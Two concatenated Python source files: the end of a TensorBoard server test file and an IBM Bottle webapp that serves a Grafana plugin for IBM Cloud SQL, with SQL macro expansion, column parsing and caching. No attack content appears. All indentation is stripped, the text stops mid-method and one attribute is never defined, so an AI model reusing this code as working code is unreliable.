- scalar events containing the value i at step 10 * i and wall time
100 * i, for i in [1, _SCALAR_COUNT).
- a graph definition
Returns:
temp_dir: The directory the test data is generated under.
"""
temp_dir = tempfile.mkdtemp(prefix=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir)
run1_path = os.path.join(temp_dir, 'run1')
os.makedirs(run1_path)
writer = writer_lib.FileWriter(run1_path)
histogram_value = summary_pb2.HistogramProto(
min=0,
max=2,
num=3,
sum=6,
sum_squares=5,
bucket_limit=[0, 1, 2],
bucket=[1, 1, 1])
# Add a simple graph event.
graph_def = graph_pb2.GraphDef()
node1 = graph_def.node.add()
node1.name = 'a'
node2 = graph_def.node.add()
node2.name = 'b'
node2.attr['very_large_attr'].s = b'a' * 2048 # 2 KB attribute
meta_graph_def = meta_graph_pb2.MetaGraphDef(graph_def=graph_def)
if self._only_use_meta_graph:
writer.add_meta_graph(meta_graph_def)
else:
writer.add_graph(graph_def)
# Add a simple run metadata event.
run_metadata = config_pb2.RunMetadata()
device_stats = run_metadata.step_stats.dev_stats.add()
device_stats.device = 'test device'
writer.add_run_metadata(run_metadata, 'test run')
# 1x1 transparent GIF.
encoded_image = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')
image_value = summary_pb2.Summary.Image(
height=1, width=1, colorspace=1, encoded_image_string=encoded_image)
audio_value = summary_pb2.Summary.Audio(
sample_rate=44100,
length_frames=22050,
num_channels=2,
encoded_audio_string=b'',
content_type='audio/wav')
writer.add_event(
event_pb2.Event(
wall_time=0,
step=0,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='histogram', histo=histogram_value),
summary_pb2.Summary.Value(
tag='image', image=image_value), summary_pb2.Summary.Value(
tag='audio', audio=audio_value)
])))
    # Write self._SCALAR_COUNT simple scalar values.
for i in xrange(1, self._SCALAR_COUNT + 1):
writer.add_event(
event_pb2.Event(
# We use different values for wall time, step, and the value so we
# can tell them apart.
wall_time=100 * i,
step=10 * i,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='simple_values', simple_value=i)
])))
writer.flush()
writer.close()
return temp_dir
class TensorboardServerUsingMetagraphOnlyTest(TensorboardServerTest):
# Tests new ability to use only the MetaGraphDef
_only_use_meta_graph = True # Server data contains only a MetaGraphDef
class ParseEventFilesSpecTest(test.TestCase):
def testRunName(self):
logdir = 'lol:/cat'
expected = {'/cat': 'lol'}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testPathWithColonThatComesAfterASlash_isNotConsideredARunName(self):
logdir = '/lol:/cat'
expected = {'/lol:/cat': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testMultipleDirectories(self):
logdir = '/a,/b'
expected = {'/a': None, '/b': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testNormalizesPaths(self):
logdir = '/lol/.//cat/../cat'
expected = {'/lol/cat': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testAbsolutifies(self):
logdir = 'lol/cat'
expected = {os.path.realpath('lol/cat'): None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRespectsGCSPath(self):
logdir = 'gs://foo/path'
expected = {'gs://foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRespectsHDFSPath(self):
logdir = 'hdfs://foo/path'
expected = {'hdfs://foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testDoesNotExpandUserInGCSPath(self):
logdir = 'gs://~/foo/path'
expected = {'gs://~/foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testDoesNotNormalizeGCSPath(self):
logdir = 'gs://foo/./path//..'
expected = {'gs://foo/./path//..': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRunNameWithGCSPath(self):
logdir = 'lol:gs://foo/path'
expected = {'gs://foo/path': 'lol'}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
class TensorBoardAssetsTest(test.TestCase):
def testTagFound(self):
tag = application.get_tensorboard_tag()
self.assertTrue(tag)
app = application.standard_tensorboard_wsgi('', True, 60)
self.assertEqual(app.tag, tag)
if __name__ == '__main__':
test.main()
app.py
# ------------------------------------------------------------------------------
# Copyright IBM Corp. 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
"""WSGI-based web app
(Python 3.8 compatible)
https://stackoverflow.com/questions/32799808/python-web-application-project-structure-and-docker-support
1. able to process and store connection to Cloud SQL server [json database file]
2. able to process `table` and `time-series` requests and return data
3. handle empty request string
4. handle empty returned data
5. able to handle requests concurrently -> thread-specific or coroutine-specific sqlClient object
6. able to handle NaN data and convert to empty string before returning
7. support special functions: $__timeFilter() and $__timeFilter(aiops) -
assumes the time column is a number, i.e. long type or timestamp type
8. allow caching based on `key` and sql_stmt
9. column detection in SELECT statements:
SELECT name
SELECT fake as name
SELECT ts_explode(...) AS (name1, name2)
10. support special functions: $__source (HIVE table and COS URL)
11. add streaming time-series and multi-time-series: $__source_test(TS), $__source_test(MTS)
12. can handle multiple queries at once
13. handle 'hide=True' when the user doesn't want to run a query
14. add 'get_result' option to allow not returning any result back - good for chained queries
15. add '--time-out' option [to pass in the value (in seconds) before timeout when
the webapp is launched as a service in IBM CloudEngine for example]
16. add '--ssl' option [to run HTTPS Webserver]
17. support using $__source in CREATE TABLE statement
18. $__timeFilter(string) - now accepts 'string' if the time column is represented as a string
19. a 'time' column is now automatically converted to datetime - if it's stored as a string
20. able to detect column name correctly even inside a nested SELECT statement [Feb 12, 2021]
21. able to detect and reject 'SELECT *'
22. add new macro: '$__timeFilterColumn(col-name, [type])' - the user can explicitly specify
    the column containing timestamp data, and needs to provide its type
    (string or long/timestamp or empty) [Feb 12, 2021]
23. add iam_max_tries
24. add and use the thin version of query-data so that memcached no longer caches the data - it only tracks the job_id (just like the get_result=False scenario) and uses it to pull the data from COS
25. enhance column extraction: support the presence of 'distinct' and 'all' in the select columns
26. func_get_macro_mapping argument: can now be either a string or a function that returns a string
27. saving data is now guaranteed to be safe from interrupts, e.g. Ctrl-C
28. job_id is now saved as part of the state of CloudSQLDB.
29. if a query is switched from get_result=True to False, it won't be rerun, based on the change in (24).
30. stop using (24) as the default - cache the whole data. The reason is that requesting the data from COS still incurs a significant delay.
31. add singletonSqlClient: apply the TS-related query transformation before using the content for tracking the query
32. TooManyRowsException: add a check for the row-count limit: prevents the Grafana client from waiting to transfer too much data
33. NoResultException: add a check for a query that returns no data
CHANGED BEHAVIOR:
* [grafana] revise conf. setting so that $__source is optional - with tooltips to explain why the user should provide it
* [grafana] add $__dest to use the default one - $__dest(csv): $__dest, $__dest(), $__dest(csv)
    $__dest(parquet), $__dest(avro, a/b/c)
* add $__source_prev, $__source_prev(), $__source_prev(A), $__source_prev(B) to refer to the
data source as the output from a previous query, or a given query based on its `refId` A or B.
* avoid re-creating sqlClient in a panel with multiple queries
* use status code 403, rather than 401, for errors: newer Grafana 7.3.x for some reason
    maps 401 to 400 and the original message is lost
* the `should_sql_stmt_be_run` check moved to outside the loop --> faster for a panel
    with multiple queries
    (the check is not rigorous - the SQL is compared before any transformation is done, so
    adjacent spaces also make queries compare as different)
* HTTPS/SSL is added (--ssl)
code:
$__dest[( format [, suffix] )]
TODO:
* add the capability to reference a variable - so that the dashboard can be updated based on the
    value(s) the user selected for that variable
* add $__get_schema(hivetable), $__get_schema(COS://URL, format), $__get_schema($__source)
BUG fixes:
1. when metrics name is not a string
2. detect column name properly when a comment is right after it
"""
try:
# A gevent-based server is actually not asynchronous, but massively multi-threaded.
import gevent
from gevent import monkey
monkey.patch_all()
except Exception:
    # gevent is optional; fall back to a non-concurrent server
    print("No concurrency")
import sys
from time import sleep
from bottle import Bottle, HTTPResponse, run, request, response, route, abort
from bottle import json_dumps
from calendar import timegm
from datetime import date, datetime
import math
import random
import os
import re
import regex
import numpy as np
from enum import Enum
import ibm_botocore
from IPython import embed
try:
import cPickle as pickle
except ImportError:
import pickle
from pandas.io.json import build_table_schema
import json
import sqlparse
from sqlparse.sql import IdentifierList, Identifier
from sqlparse.tokens import Keyword
import logging
import pandas as pd
import threading
from threading import Thread
from joblib import Memory
sys.path.insert(0, "../../Python/")
try:
from cloud_utilities.sql_query import SQLClient
from cloud_utilities.sql_magic import format_sql
from cloud_utilities.cos import ParsedUrl
except ImportError:
from ibmcloudsql.sql_query_ts import SQLClientTimeSeries as SQLClient
from ibmcloudsql.sql_magic import format_sql
from ibmcloudsql.cos import ParsedUrl
from ibmcloudsql.exceptions import (
CosUrlNotFoundException,
CosUrlInaccessibleException,
SqlQueryCrnInvalidFormatException,
RateLimitedException,
)
logger = logging.getLogger()
# the `handlers` argument of basicConfig is available since Python 3.3
logging.basicConfig(
# level=logging.DEBUG,
level=logging.INFO,
format="%(asctime)s [%(threadName)-12.12s] [%(levelname)s] %(message)s",
handlers=[logging.FileHandler("debug.log"), logging.StreamHandler()],
)
IAM_MAX_TRIES = 5
DEBUG = False
MAX_TRIES = 100
def get_parser():
import argparse
parser = argparse.ArgumentParser(description="Process backend webapp")
parser.add_argument(
"--time-out",
"-t",
dest="time_out",
help="the time-out of request in seconds (default: unlimited)",
)
parser.add_argument(
"--ssl", dest="ssl", action="store_true", help="run as HTTPS web server"
)
args = parser.parse_args()
return args
lock = threading.Lock()
lock_savejob = threading.Lock()
# use this to transform TS-related queries to a CloudSQL-compliant form
singletonSqlClient = SQLClient()
# command-line argument
cmd_args = get_parser()
cachedir = "_cache_dir"
memory = Memory(cachedir, verbose=0)
def query_data(key, key_refId, sql_stmt, rerun=False, sqlClient=None):
"""return data + job_id"""
if cmd_args.time_out is None:
# no time-out
# df = sqlClient.run_sql(sql_stmt)
df = None
if rerun:
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=True)
df, job_id = res.data, res.job_id
else:
with lock:
sql_stmt = singletonSqlClient.human_form_to_machine_form(sql_stmt)
df, job_id = _query_data_with_result(key, sql_stmt, sqlClient)
if isinstance(df, str):
df = None
return df, job_id
else:
# with time-out
if rerun:
            # not supported - would need a mechanism so that a rerun query with a time-out
            # does not lead to another rerun (i.e. automatically switch off the rerun
            # flag at the Grafana plugin level) so that the next request only retrieves the data
assert 0
else:
            job_id = grafanaPluginInstances.get_job_id(key, key_refId)
            if sqlClient is None:
                sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
            if job_id is None:
                job_id = sqlClient.submit_sql(sql_stmt)
                grafanaPluginInstances.save_job_id(key, key_refId, job_id)
job_status = sqlClient.wait_for_job(job_id, sleep_time=10)
df = None
if job_status == "completed":
df = sqlClient.get_result(job_id)
# check if job_id is present
# if so, check if job status is completed
# - if so, get the data
# if not, wait until time-out
# if time-out and still no result, send the error message back to wait a little bit and launch again
# TODO: add a time-start here
        # WARNING: multiple queries lead to failure in returning the job list (429 error) --> need to consult Torsten to fix on their side
# while not sqlClient.has_available_slot():
# # TODO - add a time-window check here (subtracting time-start)
# # when it is closed to service timeout, e.g. 10min for CloudFunction or CodeEngine
# # returns the proper message asking to rerun again
# # NOTE: better if the time-out is known - as there is no way to know how the time-out is configured for now
# # e.g. on-premise there is no time-out necessary
# time.sleep(4) # seconds
# if rerun:
# # doesn't support rerun on a system with time-out
# assert(0)
# sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
# res = sqlClient.execute_sql(sql_stmt, get_result=True)
# df, job_id = res.data, res.job_id
# else:
# df, job_id = _query_data_with_result(key, sql_stmt)
# sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
# df = sqlClient.get_result(job_id)
# print("SQL URL: ", sqlClient.sql_ui_link())
return df, job_id
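# Behavioral note on the two paths above (summary only, no new functionality):
#   * no --time-out: the (key, sql_stmt) pair is memoized on disk via joblib,
#     so a repeated panel refresh with identical SQL reuses the cached result.
#   * --time-out set: only the job_id is tracked per (dashboard, panel, refId);
#     the job is submitted once, later refreshes call wait_for_job() again and
#     fetch the result from COS once the job has completed.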
def query_data_noresultback(key, sql_stmt, rerun=False, sqlClient=None):
if cmd_args.time_out is None:
# no time-out
        if rerun:
            # rerun requested: bypass the cache and execute the query directly
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=False)
job_id = res.job_id
else:
job_id = _query_data_noresultback(key, sql_stmt, sqlClient)
else:
# with time-out
if rerun:
            # rerun is not supported when a time-out is configured
            assert cmd_args.time_out is None
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=False)
job_id = res.job_id
else:
job_id = _query_data_noresultback(key, sql_stmt, sqlClient)
return job_id
@memory.cache(ignore=["sqlClient"])
def _query_data_with_result(key, sql_stmt, sqlClient=None):
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=True)
# print("SQL URL: ", sqlClient.sql_ui_link())
return res.data, res.job_id
@memory.cache(ignore=["sqlClient"])
def _query_data_noresultback(key, sql_stmt, sqlClient=None):
"""return job_id"""
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=False)
# print("SQL URL: ", sqlClient.sql_ui_link())
return res.job_id
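# Note on caching: joblib's Memory.cache keys the two helpers above on their
# visible arguments (key, sql_stmt), while `ignore=["sqlClient"]` keeps the
# non-picklable client object out of the cache key. Re-issuing the exact same
# SQL text for the same datasource key therefore returns the memoized result
# instead of launching a new Cloud SQL job.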
# regex
regex_timeFilter = r"\$__timeFilter\s*\((\s*\w*\s*)\)"
p_timeFilter = re.compile(regex_timeFilter)
regex_timeFilterColumn = r"\$__timeFilterColumn\s*\((\s*\w*\s*),(\s*\w*\s*)\)"
p_timeFilterColumn = re.compile(regex_timeFilterColumn)
# regex
regex_source = r"(?<=(?i:FROM)\s)\s*\$__source(?!_)(\s*\(\s*\))?(?=[\b|\n|\s])?"
p_cos_in = re.compile(regex_source)
regex_source = r"(?<=(?i:USING)\s)\s*\$__source(?!_)(\s*\(\s*\))?(?=[\b|\n|\s])?"
p_cos_in_using = re.compile(regex_source)
# regex
regex_source = r"(?<=(?i:FROM)\s)\s*\$__source_test(\s*\(\s*\w*\s*\))?(?=[\b|\n|\s])?"
p_cos_in_test = re.compile(regex_source)
# regex
regex_source = r"(?<=(?i:FROM)\s)\s*\$__source_prev(\s*\(\s*\w*\s*\))(?=[\b|\n|\s])?"
p_cos_in_prev = re.compile(regex_source)
# regex
regex_source = r"(?i:INTO)\s*\$__dest(\s*\([\s|\w|,|/]*\))?(?=[\b|\n|\s])?"
p_cos_out = re.compile(regex_source)
# SELECT TS_EXPLODE(...) AS (real_col1, real_col2)
regex_ts_explode = (
r"(?i)\s*(ts_explode)[\(|\w|\s|\)|\d|,]+[aA][sS]\s*\((.*)\s*,\s*(.*)\)"
)
p_ts_explode = re.compile(regex_ts_explode)
# SELECT fake_col AS real_col
regex_as_column = r"\s*[\w|\s]+[aA][sS]\s+(\w+)\s*$"
p_as_column = re.compile(regex_as_column)
# SELECT real_col
regex_column = r"^\s*(\w+)\s*$"
p_column = re.compile(regex_column)
# nested SELECT statement
regex_nested_select = r"(?i)\(((?>[^\(\)]+|(?R))*)\)"
p_nested_select = regex.compile(regex_nested_select)
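# A few illustrative matches for the patterns above (the SQL fragments are made up):
#   p_timeFilter       : "WHERE $__timeFilter()"             -> group(1) == ""
#   p_timeFilterColumn : "$__timeFilterColumn(ts, string)"   -> groups capture 'ts' and 'string' (whitespace included)
#   p_cos_in           : "FROM $__source"                    -> matches the macro right after FROM
#   p_cos_out          : "INTO $__dest(parquet, a/b/c)"      -> the whole "INTO ... $__dest(...)" clause
#   p_ts_explode       : "ts_explode(obs) AS (tt, val)"      -> groups capture roughly 'tt' and 'val'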
def gen_key(id, name):
"""generate the key for finding the right sqlClient object"""
# TODO - this may not work when the single webapp serves different Grafana instances
# --> there is a chance that the same 'id' is shared by these Grafana instances.
return str(id) + "-" + name
def gen_key_refId(dashboardId, panelId, refId):
"""generate the key for finding the right sqlClient object,
using the given (dashboard, panel, sql-id)"""
return "-".join([str(dashboardId), str(panelId), refId])
def json_serial(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, (datetime, date)):
return obj.isoformat()
raise TypeError("Type %s not serializable" % type(obj))
def find_column_mapping(sql_stmt, columns):
"""given the outer SELECT statement
which may contain column defined as, e.g. first(my_col) as new_col,
we want to find this mapping from 'my_col' to 'new_col'
returns
-------
dict:
"""
def get_mapping(stmt):
"""return single column or multiple columns"""
# st AS column
res = re.search(r"(?i)\s*([\w|\s]+)\(([^\)]+)\)\s*[a][s]\s+(\w+)\s*$", stmt)
if res:
return {res.group(2): res.group(3)}
else:
return {}
mapping = {}
parsed = sqlparse.parse(sql_stmt)
try:
stmt = parsed[0]
except IndexError as e:
print(sql_stmt)
print(parsed)
raise e
# assert(stmt.get_type() == "SELECT")
for token in stmt.tokens:
if isinstance(token, IdentifierList):
for identifier in token.get_identifiers():
res = get_mapping(str(identifier))
mapping.update(res)
if isinstance(token, Identifier):
res = get_mapping(str(token))
mapping.update(res)
if token.ttype is Keyword: # from
break
return mapping
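# Rough example of the mapping extracted above (the query text is hypothetical):
#   find_column_mapping("SELECT first(ts) AS time, max(v) AS value FROM t", [...])
# would yield {"ts": "time"} from the first identifier and {"v": "value"} from the
# second. Note the `columns` argument is not used by the current implementation.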
def parse_sql_columns(sql):
columns = []
columns = columns + get_columns_from_single_select(sql) + parse_inner_selects(sql)
return columns
def parse_inner_selects(sql_stmt):
"""
find each inner select statement, then parse the columns from each SELECT found
"""
def find_nested_selects(stmt):
x = p_nested_select.findall(sql_stmt)
nested = []
for y in x:
y = y.strip()
if re.search(r"(?i)^select", y):
nested.append(y)
return nested
nested_selects = find_nested_selects(sql_stmt)
columns = []
for s in nested_selects:
columns = columns + parse_sql_columns(s)
return columns
def get_columns_from_single_select(sql):
"""get the list of columns in the 'SELECT' type query.
Returns an empty list, if
1. not a SELECT statement
2. SELECT * is used
History
-------
Mar, 23, 2021: can detect proper column name when comment is used, e.g.
select distinct col1 -- some comment
select distinct col1
-- some comment
"""
def get_columns(stmt):
"""return single column or multiple columns"""
# st AS column
# res = re.search(r"\s*[\w|\s]+[aA][sS]\s+(\w+)\s*$", stmt)
res = p_as_column.search(stmt)
if res:
return res.group(1)
# standalone column
# res = re.search(r'^\s*(\w+)\s*$', stmt)
res = p_column.search(stmt)
if res:
return res.group(1)
res = p_ts_explode.search(stmt)
if res:
return [res.group(2), res.group(3)]
return ""
def append(columns, res):
if isinstance(res, str):
if len(res) > 0:
columns.append(res)
elif isinstance(res, list):
for i in res:
if len(i) > 0:
columns.append(i)
return columns
columns = []
parsed = sqlparse.parse(sql)
try:
stmt = parsed[0]
except IndexError as e:
print(sql)
print(parsed)
raise e
if stmt.get_type() != "SELECT":
return columns
is_present_distinct_all = False
for token in stmt.tokens:
if isinstance(token, IdentifierList):
for identifier in token.get_identifiers():
res = get_columns(str(identifier))
columns = append(columns, res)
if isinstance(token, Identifier):
lines = str(token).splitlines() # ('-- ')
pre_comment = str(token)
for line in lines:
if line.strip().startswith("--"):
pass
else:
line = line.split(" --")[0]
pre_comment = line
break
res = get_columns(pre_comment)
columns = append(columns, res)
is_present_distinct_all = False
if str(token).lower() in ["distinct", "all"]:
is_present_distinct_all = True
if token.ttype is Keyword and is_present_distinct_all is False: # from
break
return columns
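# Sketch of expected outputs (queries are illustrative only):
#   get_columns_from_single_select("SELECT ts AS time, value FROM t")
#       -> ["time", "value"]
#   get_columns_from_single_select("SELECT * FROM t")
#       -> []   (rejected later as 'SELECT *')
#   get_columns_from_single_select("SELECT ts_explode(obs) AS (tt, val) FROM t")
#       -> roughly ["tt", "val"], per the ts_explode support noted in the module docstring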
class TooManyRowsException(Exception):
"""The error when the query returns too many rows"""
def __init__(self, msg, original_exception=None):
if original_exception is not None:
super().__init__(msg + (": %s" % original_exception))
else:
super().__init__(msg)
self.original_exception = original_exception
class NoResultException(Exception):
"""The error when the query returns nothing"""
def __init__(self, msg, original_exception=None):
if original_exception is not None:
super().__init__(msg + (": %s" % original_exception))
else:
super().__init__(msg)
self.original_exception = original_exception
class SourceType(Enum):
UNUSED = 1
TABLE = 2
COSURL = 3
def RepresentsInt(s):
try:
int(s)
return True
except ValueError:
return False
def process_macro_timeFilterColumn(p_timeFilter, sql_stmt, sdt_from, sdt_to):
pattern = p_timeFilter.search(sql_stmt)
while pattern:
# the $__timeFilterColumn is used
time_col = pattern.group(1).strip().lower()
type_of_column = pattern.group(2).strip().lower()
substr = ""
# process for regular data
if "string" == type_of_column:
# the type is string
# if {time_col} is in timestamp
substr += """ to_timestamp({time_col}) BETWEEN to_timestamp("{dt_from}") and to_timestamp("{dt_to}")""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
else:
substr += """ cast({time_col}/1000 as long) BETWEEN to_unix_timestamp(to_timestamp("{dt_from}")) and to_unix_timestamp(to_timestamp("{dt_to}"))""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
sql_stmt = p_timeFilter.sub(substr, sql_stmt, count=1)
pattern = p_timeFilter.search(sql_stmt)
return sql_stmt
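# Illustrative expansion (column name and time range are made up): with
# sdt_from="2021-01-01T00:00:00Z" and sdt_to="2021-01-02T00:00:00Z",
#   WHERE $__timeFilterColumn(ts, string)
# becomes roughly
#   WHERE to_timestamp(ts) BETWEEN to_timestamp("2021-01-01T00:00:00Z") and to_timestamp("2021-01-02T00:00:00Z")
# and for any other (or empty) type the numeric form
#   cast(ts/1000 as long) BETWEEN to_unix_timestamp(...) and to_unix_timestamp(...)
# is used instead.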
def process_macro_data_source(p_reg, func_get_macro_mapping, key, sql_stmt):
"""
process $__source macro
Parameters
----------
p_reg:
        pattern object to detect the presence of the macro
    func_get_macro_mapping:
        a function that translates the key into the configured data source string
    key: string
        the key that is used to identify the right data source
    sql_stmt: str
        the SQL string
    Returns
    -------
    the SQL string with the macro replaced
"""
patterns = p_reg.findall(sql_stmt)
try:
substr = func_get_macro_mapping(key)
except KeyError:
# TODO: maybe we want to resend the credential each time - as when deploying to CodeEngine - the storage is not permanent?
msg = "The webapp doesn't hold CloudSQL info - you may want to revalidate in the datasource setting"
        # NOTE: callers expect a plain SQL string here, so raise the error
        # response instead of returning an (error, response) tuple
        raise HTTPResponse(
            body=json.dumps({"error": msg}),
            status=403,
            headers={"Content-type": "application/json"},
        )
if len(patterns) > 0 and len(substr) == 0:
msg = "Can't use $__source (default value has not been configured yet)"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern:
# the $__source is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
return sql_stmt
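# Example (the COS URL below is a placeholder configured per datasource):
# if get_cos_source(key) returns "cos://us-south/my-bucket/data STORED AS PARQUET",
# then "SELECT ts FROM $__source WHERE ..." is rewritten to
# "SELECT ts FROM cos://us-south/my-bucket/data STORED AS PARQUET WHERE ...".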
def revise_time_column(time_col, df):
"""
    the dataframe may have a column representing datetime, but it may be in string format;
    we need to convert it to the right format
"""
df.sort_values(by=time_col, inplace=True)
if isinstance(df[time_col][0], str) and df[time_col][0].endswith("Z"):
# remove 'Z' from datetime
        # and map to a string representation
try:
tmp = [
str(x)
for x in pd.to_datetime(df[time_col], format="%Y-%m-%dT%H:%M:%S.%fZ")
]
except ValueError:
tmp = [
str(x)
for x in pd.to_datetime(df[time_col], format="%Y-%m-%dT%H:%M:%SZ")
]
df[time_col] = tmp
# datetime64[ns] --> convert to 'ms'
# df[time_col] = pd.to_datetime(df[time_col], format="%Y-%m-%dT%H:%M:%S.%fZ").values.astype('int64') // 10**6
# .values.astype('int64') // 10**6
return df
class CloudSQLDB(dict):
def __init__(self, *arg, **kw):
super(CloudSQLDB, self).__init__(*arg, **kw)
self.db_file = "cloud_cos_db.json"
self.sqlclient_file = "sqlclient_db.pkl"
self.read()
# holding fake time-series data source
self._current_ts_df = {}
self._current_mts_df = {}
# @property
# def data(self):
# return self._content
def read(self):
_content = None
try:
with open(self.db_file, "r") as read_file:
_content = json.load(read_file)
except FileNotFoundError:
pass
if _content:
for k, v in _content.items():
self[k] = v
def save_no_interrupt(self):
a = Thread(target=self.save)
a.start()
a.join()
def save(self):
if len(self.keys()) > 0:
with open(self.db_file, "w") as write_file:
json.dump(self, write_file)
def get_sqlclient(self, key, thread_safe=False):
apiKey = self[key]["apiKey"]
instance_crn = self[key]["instance_crn"]
target_cos_url = self[key]["target_cos_url"]
if thread_safe is False:
if key in grafanaPluginInstancesSqlClient.keys():
sqlClient = grafanaPluginInstancesSqlClient[key]
print("Found SqlClient... ", sqlClient)
else:
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
)
grafanaPluginInstancesSqlClient[key] = sqlClient
else:
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
thread_safe=True,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
)
print("Create thread-safe SqlClient... ", sqlClient)
sqlClient.logon()
return sqlClient
def get_cos_source(self, key):
# stored_using_table = tmp_body.get('using_table').strip()
if self[key]["using_table"]:
table = self[key]["table"]
if len(table.strip()) == 0:
return ""
else:
return " {} ".format(table)
else:
try:
cos_in = self[key]["source_cos_url"]
except KeyError:
return ""
if len(cos_in.strip()) == 0:
return ""
else:
format_type = self[key]["format_type"]
return "{} STORED AS {}".format(cos_in, format_type)
def get_cos_source_using(self, key):
# stored_using_table = tmp_body.get('using_table').strip()
if self[key]["using_table"]:
table = self[key]["table"]
if len(table.strip()) == 0:
return ""
else:
return " {} ".format(table)
else:
try:
cos_in = self[key]["source_cos_url"]
except KeyError:
return ""
if len(cos_in.strip()) == 0:
return ""
else:
format_type = self[key]["format_type"]
return "{} LOCATION {}".format(format_type, cos_in)
def get_cos_dest(self, key, suffix, format_type):
# stored_using_table = tmp_body.get('using_table').strip()
# if self[key]['target_cos_url'][-1] == '/':
cos_out = "/".join([self[key]["target_cos_url"], suffix])
cos_out = "INTO {} STORED AS {} ".format(cos_out, format_type)
return cos_out
def get_sts_random_data(self, key, dt_from, dt_to):
values = """
FROM VALUES -- timestamp, observation
(1, 10), (2, 20), (3, 30), (4, 40),
(5, 5), (6, 10), (7, 15), (8, 40),
(9, 100), (10, 200), (11, 300), (12, 400)
AS ds
"""
# np.random.seed(2019)
N = 30
rng = pd.date_range(dt_from, dt_to, periods=N)
df = pd.DataFrame(
np.random.randint(20, size=(N, 2)),
columns=["timestamp", "observation"],
index=rng,
)
##.rename(columns={df.index.name:'timestamp'})
df = df.drop("timestamp", axis=1)
# df.reset_index(inplace=True)
# df.rename(columns={"index":"timestamp"})
# df.index = pd.to_datetime(df['index']).astype(np.int64) // 10**6
df.index = pd.to_datetime(df.index).astype(np.int64) // 10 ** 6
if key not in self._current_ts_df:
self._current_ts_df[key] = df
else:
idx_start = (
pd.to_datetime(dt_from).to_datetime64().astype(np.int64) // 10 ** 6
)
idx_end = pd.to_datetime(dt_to).to_datetime64().astype(np.int64) // 10 ** 6
# idx_start = df.iloc[0].name
# idx_end = df.iloc[-1].name
df = df.loc[(df.index > self._current_ts_df[key].iloc[-1].name)]
self._current_ts_df[key] = self._current_ts_df[key].append(df)
# NOTE : currently not removing old ones
# self._current_ts_df[key] = self._current_ts_df[key].loc[(self._current_ts_df[key].index >= idx_start) & (self._current_ts_df[key].index <= idx_end)]
# df = self._current_ts_df[key]
df = self._current_ts_df[key].loc[
(self._current_ts_df[key].index >= idx_start)
& (self._current_ts_df[key].index <= idx_end)
]
x = list(df.to_records(index=True))
data = ", ".join([str(i) for i in x])
assert len(data) > 0
values = """
VALUES -- timestamp, observation
{}
AS ds
""".format(
data
)
return values
def get_mts_random_data(self, key, dt_from, dt_to):
values = """
FROM VALUES -- key, timestamp, observation
(2017, 1 ,100),
(2017, 1 ,50),
(2017, 2 ,200),
(2017, 2 ,300),
(2018, 1 ,300),
(2018, 1 ,100),
(2018, 2 ,400) AS ds
"""
# np.random.seed(2019)
num_metrics = 2
df = None
for i in range(0, num_metrics + 1):
N = np.random.randint(20, 30)
rng = pd.date_range(dt_from, dt_to, periods=N)
tmp_df = pd.DataFrame(
np.hstack((np.random.randint(20, size=(N, 1)), np.array([[i] * N]).T)),
columns=["observation", "key"],
index=rng,
)
if df is None:
df = tmp_df
else:
df = df.append(tmp_df, ignore_index=False)
idx_start = pd.to_datetime(dt_from).to_datetime64().astype(np.int64) // 10 ** 6
idx_end = pd.to_datetime(dt_to).to_datetime64().astype(np.int64) // 10 ** 6
# millisecond
df.index = pd.to_datetime(df.index).astype(np.int64) // 10 ** 6
if key not in self._current_mts_df:
self._current_mts_df[key] = df
else:
df = df.loc[(df.index > self._last_mts_idx_end)]
self._current_mts_df[key] = self._current_mts_df[key].append(df)
# NOTE : currently not removing old ones
